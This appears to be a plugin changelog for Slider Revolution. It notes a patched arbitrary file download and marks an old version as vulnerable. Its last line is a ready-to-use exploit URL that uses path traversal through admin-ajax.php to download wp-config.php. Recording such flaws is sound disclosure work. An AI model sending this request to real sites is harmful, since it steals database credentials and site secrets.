=== Slider Revolution === Stable tag: 6.6.18 License: Commercial == Changelog == = 6.6.18 = * Security: Patched unauthenticated arbitrary file download * Fixed: CVE-2014-9035 Local File Inclusion = 4.1.4 = * VULNERABLE - Arbitrary file download via admin-ajax.php * Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php